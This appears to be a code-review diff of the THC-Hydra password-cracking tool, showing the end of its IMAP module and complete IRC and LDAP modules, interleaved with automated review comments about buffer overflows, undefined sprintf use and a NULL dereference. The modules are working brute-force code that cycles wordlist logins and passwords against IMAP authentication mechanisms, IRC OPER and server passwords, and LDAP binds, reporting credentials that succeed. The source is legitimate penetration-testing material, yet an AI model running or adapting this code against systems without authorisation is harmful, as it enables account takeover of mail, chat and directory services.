if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not a valid server challenge\n");
free(buf);
return 1;
} else {
/* recover server challenge */
memset(buffer, 0, sizeof(buffer));
//+ cj1oeWRyYU9VNVZqcHQ5RjNqcmVXRVFWTCxzPWhGbTNnRGw0akdidzJVVHosaT00MDk2
from64tobits((char *) buffer, buf + 2);
free(buf);
strncpy(serverfirstmessage, buffer, sizeof(serverfirstmessage) - 1);
serverfirstmessage[sizeof(serverfirstmessage) - 1] = '\0';
memset(buffer2, 0, sizeof(buffer2));
sasl_scram_sha1(buffer2, pass, clientfirstmessagebare, serverfirstmessage);
if (buffer2 == NULL) {
hydra_report(stderr, "[ERROR] Can't compute client response\n");
return 1;
}
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
//Send auth request
sprintf(buffer, "%d AUTHENTICATE NTLM\r\n", counter);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
hydra_report(stderr, "[ERROR] IMAP NTLM AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
//send auth and receive challenge
//send auth request: lst the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
sprintf(buffer, "%s\r\n", buf1);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
//recover challenge
from64tobits((char *) buf1, buf + 2);
free(buf);
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "%s\r\n", buf1);
}
break;
default:
//clear authentication
sprintf(buffer, "%d LOGIN \"%.100s\" \"%.100s\"\r\n", counter, login, pass);
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
if (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL || strstr(buf, "BYE") != NULL) {
if (verbose)
hydra_report(stderr, "[ERROR] %s\n", buf);
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
if (counter == 4)
return 1;
return (2);
}
free(buf);
hydra_report_found_host(port, ip, "imap", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_imap(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_IMAP, mysslport = PORT_IMAP_SSL, disable_tls = 1;
char *buffer1 = "1 CAPABILITY\r\n";
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
buf = hydra_receive_line(sock);
if ((buf == NULL) || (strstr(buf, "OK") == NULL && buf[0] != '*')) { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an IMAP protocol or service shutdown:\n");
if (buf != NULL)
free(buf);
hydra_child_exit(2);
}
free(buf);
/* send capability request */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
exit(-1);
counter = 2;
buf = imap_read_server_capacity(sock);
if (buf == NULL) {
hydra_child_exit(2);
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
int i;
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) {
disable_tls = 0;
}
}
#ifdef LIBOPENSSL
if (!disable_tls) {
/* check for STARTTLS, if available we may have access to more basic auth methods */
if (strstr(buf, "STARTTLS") != NULL) {
hydra_send(sock, "2 STARTTLS\r\n", strlen("2 STARTTLS\r\n"), 0);
counter++;
free(buf);
buf = hydra_receive_line(sock);
if (buf == NULL || (strstr(buf, " NO ") != NULL || strstr(buf, "failed") != NULL || strstr(buf, " BAD ") != NULL)) {
hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
disable_tls = 1;
run = 1;
break;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
/* ask again capability request but in TLS mode */
if (hydra_send(sock, "3 CAPABILITY\r\n", strlen("3 CAPABILITY\r\n"), 0) < 0)
hydra_child_exit(2);
buf = imap_read_server_capacity(sock);
counter++;
if (buf == NULL)
hydra_child_exit(2);
}
} else
hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n");
}
#endif
if (verbose)
hydra_report(stderr, "[VERBOSE] CAPABILITY: %s", buf);
//authentication should be listed AUTH= like in the extract below
//STARTTLS LOGINDISABLED AUTH=GSSAPI AUTH=DIGEST-MD5 AUTH=CRAM-MD5
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=NTLM") != NULL)) {
imap_auth_mechanism = AUTH_NTLM;
}
#ifdef LIBOPENSSL
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=SCRAM-SHA-1") != NULL)) {
imap_auth_mechanism = AUTH_SCRAMSHA1;
}
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=DIGEST-MD5") != NULL)) {
imap_auth_mechanism = AUTH_DIGESTMD5;
}
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-SHA256") != NULL)) {
imap_auth_mechanism = AUTH_CRAMSHA256;
}
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-SHA1") != NULL)) {
imap_auth_mechanism = AUTH_CRAMSHA1;
}
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=CRAM-MD5") != NULL)) {
imap_auth_mechanism = AUTH_CRAMMD5;
}
#endif
if ((strstr(buf, "=LOGIN") == NULL) && (strstr(buf, "=PLAIN") != NULL)) {
imap_auth_mechanism = AUTH_PLAIN;
}
if (strstr(buf, "=LOGIN") != NULL) {
imap_auth_mechanism = AUTH_LOGIN;
}
free(buf);
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
if (strstr(miscptr, "CLEAR"))
imap_auth_mechanism = AUTH_CLEAR;
if (strstr(miscptr, "LOGIN"))
imap_auth_mechanism = AUTH_LOGIN;
if (strstr(miscptr, "PLAIN"))
imap_auth_mechanism = AUTH_PLAIN;
#ifdef LIBOPENSSL
if (strstr(miscptr, "CRAM-MD5"))
imap_auth_mechanism = AUTH_CRAMMD5;
if (strstr(miscptr, "CRAM-SHA1"))
imap_auth_mechanism = AUTH_CRAMSHA1;
if (strstr(miscptr, "CRAM-SHA256"))
imap_auth_mechanism = AUTH_CRAMSHA256;
if (strstr(miscptr, "DIGEST-MD5"))
imap_auth_mechanism = AUTH_DIGESTMD5;
if (strstr(miscptr, "SCRAM-SHA1"))
imap_auth_mechanism = AUTH_SCRAMSHA1;
#endif
if (strstr(miscptr, "NTLM"))
imap_auth_mechanism = AUTH_NTLM;
}
if (verbose) {
switch (imap_auth_mechanism) {
case AUTH_CLEAR:
hydra_report(stderr, "[VERBOSE] using IMAP CLEAR LOGIN mechanism\n");
break;
case AUTH_LOGIN:
hydra_report(stderr, "[VERBOSE] using IMAP LOGIN AUTH mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using IMAP PLAIN AUTH mechanism\n");
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
hydra_report(stderr, "[VERBOSE] using IMAP CRAM-MD5 AUTH mechanism\n");
break;
case AUTH_CRAMSHA1:
hydra_report(stderr, "[VERBOSE] using IMAP CRAM-SHA1 AUTH mechanism\n");
break;
case AUTH_CRAMSHA256:
hydra_report(stderr, "[VERBOSE] using IMAP CRAM-SHA256 AUTH mechanism\n");
break;
case AUTH_DIGESTMD5:
hydra_report(stderr, "[VERBOSE] using IMAP DIGEST-MD5 AUTH mechanism\n");
break;
case AUTH_SCRAMSHA1:
hydra_report(stderr, "[VERBOSE] using IMAP SCRAM-SHA1 AUTH mechanism\n");
break;
#endif
case AUTH_NTLM:
hydra_report(stderr, "[VERBOSE] using IMAP NTLM AUTH mechanism\n");
break;
}
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_imap(sock, ip, port, options, miscptr, fp);
counter++;
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_imap_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
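Review bot: in the AUTH_PLAIN and CRAM branches of start_imap, `sprintf(buffer, "%.250s\r\n", buffer);` passes the same array as destination and source, which is undefined behaviour for sprintf; build the line in a second buffer with snprintf, or append the CRLF with a bounded concatenation. The CRAM and SCRAM-SHA-1 branches also return on send/receive errors before `free(preplogin)` is reached, so every failed attempt leaks the saslprep result. `if (buffer2 == NULL)` after sasl_digest_md5() and sasl_scram_sha1() tests an array that the same code passes to sizeof, so it can never be true and a failed computation goes unnoticed; have those helpers return a status and check that instead. In service_imap, when the STARTTLS reply is missing or negative the code only prints an error and falls through: with `buf == NULL` the later `strstr(buf, "=LOGIN")` dereferences NULL, and with a " NO " reply the mechanism detection runs on the STARTTLS response instead of a capability line while the session stays unencrypted even though TLS was requested. Exit the child or restart the connection on that path.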

218
hydra-irc.c Normal file

@ -0,0 +1,218 @@
#include "hydra-mod.h"
/*
RFC 1459: Internet Relay Chat Protocol
*/
extern char *HYDRA_EXIT;
char *buf;
char buffer[300] = "";
int myport = PORT_IRC, mysslport = PORT_IRC_SSL;
int start_oper_irc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
int ret;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
sprintf(buffer, "OPER %s %s\r\n", login, pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 3;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
/* :irc.debian.org 381 koma :You are now an IRC Operator */
/* :irc.debian.org 464 koma :Invalid password */
if ((ret > 0) && (strstr(buffer, " 381 ") != NULL)) {
hydra_report_found_host(port, ip, "irc", fp);
hydra_completed_pair_found();
} else {
hydra_completed_pair();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
int send_nick(int s, char *ip, char *pass) {
if (strlen(pass) > 0) {
sprintf(buffer, "PASS %s\r\n", pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return -1;
}
}
sprintf(buffer, "CAP LS\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return -1;
}
sprintf(buffer, "NICK hydra%d\r\nUSER hydra%d hydra %s :hydra\r\n", (int) getpid(), (int) getpid(), hydra_address2string(ip));
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return -1;
}
return 0;
}
int irc_server_connect(char *ip, int sock, int port, unsigned char options) {
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
return sock;
}
int start_pass_irc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass;
int ret;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
s = irc_server_connect(ip, s, port, options);
if (s < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
return 3;
}
if (send_nick(s, ip, pass) < 0) {
return 3;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
#ifdef HAVE_PCRE
if ((ret > 0) && (!hydra_string_match(buffer, "ERROR\\s.*password"))) {
#else
if ((ret > 0) && (strstr(buffer, "ERROR") == NULL)) {
#endif
hydra_report_pass_found(port, ip, "irc", fp);
hydra_completed_pair_found();
hydra_report(stderr, "[INFO] Server password '%s' is working, you can pass it as argument\nto irc module to then try login/password oper mode\n", pass);
} else {
if (verbose && (miscptr != NULL))
hydra_report(stderr, "[VERBOSE] Server is requesting a general password, '%s' you entered is not working\n", miscptr);
hydra_completed_pair();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 4;
}
void service_irc(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, ret;
char *buf;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
sock = irc_server_connect(ip, sock, port, options);
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
if (miscptr == NULL) {
miscptr = "";
}
if (send_nick(sock, ip, miscptr) < 0) {
hydra_child_exit(1);
}
ret = hydra_recv(sock, buffer, sizeof(buffer));
/* ERROR :Bad password */
#ifdef HAVE_PCRE
if ((ret > 0) && (hydra_string_match(buffer, "ERROR\\s.*password"))) {
#else
if ((ret > 0) && (strstr(buffer, "ERROR") != NULL)) {
#endif
if (verbose)
hydra_report(stderr, "[INFO] Server is requesting a password, will try to find it\n");
if (sock >= 0)
sock = hydra_disconnect(sock);
next_run = 4;
break;
}
while (hydra_data_ready(sock)) {
buf = hydra_receive_line(sock);
free(buf);
}
if ((ret > 0) && (strstr(buffer, " 432 ") != NULL)) {
/* :irc.debian.org 432 * hydra_5075 :Erroneous nickname */
if (verbose)
hydra_report(stderr, "[ERROR] Erroneous nickname\n");
hydra_child_exit(0);
}
if ((ret > 0) && (strstr(buffer, " 433 ") != NULL)) {
/* :irc.debian.org 433 * hydra :Nickname already in use */
if (verbose)
hydra_report(stderr, "[ERROR] Nickname already in use\n");
hydra_child_exit(0);
}
/* ERROR :Bad password is returned from ngircd when it s waiting for a server password */
if ((ret > 0) && (strstr(buffer, " 001 ") == NULL)) {
/* seems we not successfully connected */
hydra_report(stderr, "[ERROR] should not be able to identify server msg, please report it\n%s\n", buffer);
hydra_child_exit(0);
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_oper_irc(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4:
next_run = start_pass_irc(sock, ip, port, options, miscptr, fp);
break;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_irc_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
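Review bot: `sprintf(buffer, "OPER %s %s\r\n", login, pass);` in start_oper_irc and `sprintf(buffer, "PASS %s\r\n", pass);` in send_nick write attacker-independent but user-sized strings into the 300-byte global `buffer` with no length limit, so a long login, password or module argument overruns it. Use snprintf with sizeof(buffer) and skip the pair (or report an error) on truncation. Each `hydra_recv(s, buffer, sizeof(buffer))` is followed by strstr() on the result; the definition of hydra_recv is not part of this diff view, so unless it guarantees NUL termination, receive at most sizeof(buffer) - 1 bytes and terminate at `buffer[ret]` before searching. In service_irc case 1, a failed receive (`ret <= 0`) skips every check and still moves to state 2, and in that case strstr also runs on whatever the previous send left in the shared buffer; treat `ret <= 0` as a connection error.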

452
hydra-ldap.c Normal file

@ -0,0 +1,452 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
unsigned char *buf;
int counter;
int tls_required = 0;
int start_ldap(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp, char version, int auth_method) {
char *empty = "";
char *login = "", *pass;
unsigned char buffer[512];
int length = 0;
int ldap_auth_mechanism = auth_method;
/*
The LDAP "simple" method has three modes of operation:
* anonymous= no user no pass
* unauthenticated= user but no pass
* user/password authenticated= user and pass
*/
if ((miscptr != NULL) && (ldap_auth_mechanism == AUTH_CLEAR)) {
login = miscptr;
} else {
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
}
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
switch (ldap_auth_mechanism) {
case AUTH_CLEAR:
length = 14 + strlen(login) + strlen(pass);
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
length = 14 + strlen(miscptr) + strlen("CRAM-MD5") + 2;
break;
case AUTH_DIGESTMD5:
length = 14 + strlen(miscptr) + strlen("DIGEST-MD5") + 2;
break;
#endif
}
memset(buffer, 0, sizeof(buffer));
buffer[0] = 48;
buffer[1] = length - 2;
buffer[2] = 2;
buffer[3] = 1;
buffer[4] = counter % 256;
buffer[5] = 96;
buffer[6] = length - 7;
buffer[7] = 2;
buffer[8] = 1;
buffer[9] = version;
buffer[10] = 4;
if (ldap_auth_mechanism == AUTH_CLEAR) {
buffer[11] = strlen(login); /* DN */
memcpy(&buffer[12], login, strlen(login));
buffer[12 + strlen(login)] = (unsigned char) 128;
buffer[13 + strlen(login)] = strlen(pass);
memcpy(&buffer[14 + strlen(login)], pass, strlen(pass)); /* PASS */
} else {
char *authm = "DIGEST-MD5";
if (ldap_auth_mechanism == AUTH_CRAMMD5) {
authm = "CRAM-MD5";
}
if ((strlen(miscptr)) > sizeof(buffer) - 16 - strlen(authm)) {
miscptr[sizeof(buffer) - 16 - strlen(authm)] = '\0';
}
buffer[11] = strlen(miscptr); /* DN */
memcpy(&buffer[12], miscptr, strlen(miscptr));
buffer[12 + strlen(miscptr)] = 163;
buffer[13 + strlen(miscptr)] = 2 + strlen(authm);
buffer[14 + strlen(miscptr)] = 4;
buffer[15 + strlen(miscptr)] = strlen(authm);
memcpy(&buffer[16 + strlen(miscptr)], authm, strlen(authm));
}
if (hydra_send(s, (char *) buffer, length, 0) < 0)
return 1;
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL)
return 1;
if (buf[0] != 0 && buf[0] != 32 && buf[9] == 2) {
if (verbose)
hydra_report(stderr, "[VERBOSE] Protocol invalid\n");
free(buf);
return 3;
}
if (buf[0] != 0 && buf[0] != 32 && buf[9] == 13) {
if (verbose)
hydra_report(stderr, "[VERBOSE] Confidentiality required, TLS has to be enabled\n");
tls_required = 1;
free(buf);
return 1;
}
if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 34) {
hydra_report(stderr, "[ERROR] Invalid DN Syntax\n");
hydra_child_exit(2);
free(buf);
return 3;
}
#ifdef LIBOPENSSL
/* one more step auth for CRAM and DIGEST */
if (ldap_auth_mechanism == AUTH_CRAMMD5) {
/* get the challenge, need to extract it */
char *ptr;
char buf2[32];
ptr = strstr((char *) buf, "<");
sasl_cram_md5(buf2, pass, ptr);
if (buf2 == NULL)
return 1;
counter++;
if (strstr(miscptr, "^USER^") != NULL) {
miscptr = hydra_strrep(miscptr, "^USER^", login);
}
length = 12 + strlen(miscptr) + 4 + strlen("CRAM-MD5") + 2 + strlen(login) + 1 + strlen(buf2);
memset(buffer, 0, sizeof(buffer));
buffer[0] = 48;
buffer[1] = length - 2;
buffer[2] = 2;
buffer[3] = 1;
buffer[4] = counter % 256;
buffer[5] = 96;
buffer[6] = length - 7;
buffer[7] = 2;
buffer[8] = 1;
buffer[9] = version;
buffer[10] = 4;
buffer[11] = strlen(miscptr); /* DN */
memcpy(&buffer[12], miscptr, strlen(miscptr));
buffer[12 + strlen(miscptr)] = 163;
buffer[13 + strlen(miscptr)] = 2 + strlen("CRAM-MD5") + 2 + strlen(login) + 1 + strlen(buf2);
buffer[14 + strlen(miscptr)] = 4;
buffer[15 + strlen(miscptr)] = strlen("CRAM-MD5");
memcpy(&buffer[16 + strlen(miscptr)], "CRAM-MD5", strlen("CRAM-MD5"));
buffer[16 + strlen(miscptr) + strlen("CRAM-MD5")] = 4;
buffer[17 + strlen(miscptr) + strlen("CRAM-MD5")] = strlen(login) + 1 + strlen(buf2);
memcpy(&buffer[18 + strlen(miscptr) + strlen("CRAM-MD5")], login, strlen(login));
buffer[18 + strlen(miscptr) + strlen("CRAM-MD5") + strlen(login)] = ' ';
memcpy(&buffer[18 + strlen(miscptr) + strlen("CRAM-MD5") + strlen(login) + 1], buf2, strlen(buf2));
if (hydra_send(s, (char *) buffer, length, 0) < 0)
return 1;
free(buf);
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL)
return 1;
} else {
if (ldap_auth_mechanism == AUTH_DIGESTMD5) {
char *ptr;
char buffer2[500];
int ind = 0;
ptr = strstr((char *) buf, "realm=");
counter++;
if (strstr(miscptr, "^USER^") != NULL) {
miscptr = hydra_strrep(miscptr, "^USER^", login);
}
sasl_digest_md5(buffer2, login, pass, ptr, miscptr, "ldap", NULL, 0, NULL);
if (buffer2 == NULL) {
free(buf);
return 3;
}
length = 26 + strlen(miscptr) + strlen("DIGEST-MD5") + strlen(buffer2);
memset(buffer, 0, sizeof(buffer));
ind = 0;
buffer[ind] = 48;
ind++;
buffer[ind] = 130;
ind++;
if (length - 4 > 255) {
buffer[ind] = 1;
ind++;
buffer[ind] = length - 256 - 4;
ind++;
} else {
buffer[ind] = 0;
ind++;
buffer[ind] = length - 4;
ind++;
}
buffer[ind] = 2;
ind++;
buffer[ind] = 1;
ind++;
buffer[ind] = counter % 256;
ind++;
buffer[ind] = 96; /*0x60 */
ind++;
buffer[ind] = 130;
ind++;
if (length - 7 - 4 > 255) {
buffer[ind] = 1;
ind++;
buffer[ind] = length - 256 - 11;
ind++;
} else {
buffer[ind] = 0;
ind++;
buffer[ind] = length - 11;
ind++;
}
buffer[ind] = 2;
ind++;
buffer[ind] = 1;
ind++;
buffer[ind] = version;
ind++;
buffer[ind] = 4;
ind++;
buffer[ind] = strlen(miscptr);
ind++;
memcpy(&buffer[ind], miscptr, strlen(miscptr));
/*DN*/ buffer[ind + strlen(miscptr)] = 163; //0xa3
ind++;
buffer[ind + strlen(miscptr)] = 130; //0x82
ind++;
if (strlen(buffer2) + 6 + strlen("DIGEST-MD5") > 255) {
buffer[ind + strlen(miscptr)] = 1;
ind++;
buffer[ind + strlen(miscptr)] = strlen(buffer2) + 6 + strlen("DIGEST-MD5") - 256;
} else {
buffer[ind + strlen(miscptr)] = 0;
ind++;
buffer[ind + strlen(miscptr)] = strlen(buffer2) + 6 + strlen("DIGEST-MD5");
}
ind++;
buffer[ind + strlen(miscptr)] = 4;
ind++;
buffer[ind + strlen(miscptr)] = strlen("DIGEST-MD5");
ind++;
memcpy(&buffer[ind + strlen(miscptr)], "DIGEST-MD5", strlen("DIGEST-MD5"));
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 4;
ind++;
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 130;
ind++;
if (strlen(buffer2) > 255) {
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 1;
ind++;
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = strlen(buffer2) - 256;
} else {
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = 0;
ind++;
buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")] = strlen(buffer2);
}
ind++;
memcpy(&buffer[ind + strlen(miscptr) + strlen("DIGEST-MD5")], buffer2, strlen(buffer2));
ind++;
if (hydra_send(s, (char *) buffer, length, 0) < 0)
return 1;
free(buf);
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL)
return 1;
}
}
#endif
/* success is: 0a 01 00 - failure is: 0a 01 31 */
if ((buf[0] != 0 && buf[9] == 0) || (buf[0] != 32 && buf[9] == 32)) {
hydra_report_found_host(port, ip, "ldap", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 7) {
hydra_report(stderr, "[ERROR] Unknown authentication method\n");
free(buf);
hydra_child_exit(2);
}
if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 53) {
if (verbose)
hydra_report(stderr, "[VERBOSE] Server unwilling to perform action, maybe deny by server config or too busy when tried login: %s password: %s\n", login, pass);
free(buf);
return 1;
}
if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 2) {
hydra_report(stderr, "[ERROR] Invalid protocol version, you tried ldap%c, better try ldap%c\n", version + '0', version == 2 ? '3' : '2');
free(buf);
hydra_child_exit(2);
sleep(1);
hydra_child_exit(2);
}
//0 0x30, 0x84, 0x20, 0x20, 0x20, 0x10, 0x02, 0x01,
//8 0x01, 0x61, 0x84, 0x20, 0x20, 0x20, 0x07, 0x0a,
//16 0x01, 0x20, 0x04, 0x20, 0x04, 0x20, 0x00, 0x00,
// this is for w2k8 active directory ldap auth
if (buf[0] == 48 && buf[1] == 132) {
if (buf[9] == 0x61 && buf[1] == 0x84) {
if (buf[17] == 0 || buf[17] == 0x20) {
hydra_report_found_host(port, ip, "ldap", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
} else {
if (buf[9] != 49 && buf[9] != 2 && buf[9] != 53) {
hydra_report(stderr, "[ERROR] Uh, unknown LDAP response! Please report this: \n");
print_hex((unsigned char *) buf, 24);
free(buf);
return 3;
}
}
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_ldap(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port, char version, int auth_method) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_LDAP, mysslport = PORT_LDAP_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
counter = 1;
if (tls_required) {
/* Start TLS operation OID = 1.3.6.1.4.1.1466.20037 according to RFC 2830 */
char confidentiality_required[] = "\x30\x1d\x02\x01\x01\x77\x18\x80\x16\x31\x2e\x33\x2e\x36\x2e\x31\x2e\x34\x2e\x31\x2e\x31\x34\x36\x36\x2e\x32\x30\x30\x33\x37";
if (hydra_send(sock, confidentiality_required, strlen(confidentiality_required), 0) < 0)
hydra_child_exit(1);
if ((buf = (unsigned char *) hydra_receive_line(sock)) == NULL)
hydra_child_exit(1);
if ((buf[0] != 0 && buf[9] == 0) || (buf[0] != 32 && buf[9] == 32)) {
/* TLS option negociation goes well, now trying to connect */
if ((hydra_connect_to_ssl(sock) == -1) && verbose) {
hydra_report(stderr, "[ERROR] Can't use TLS\n");
hydra_child_exit(1);
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
counter++;
}
} else {
hydra_report(stderr, "[ERROR] Can't use TLS %s\n", buf);
hydra_child_exit(1);
}
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_ldap(sock, ip, port, options, miscptr, fp, version, auth_method);
counter++;
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
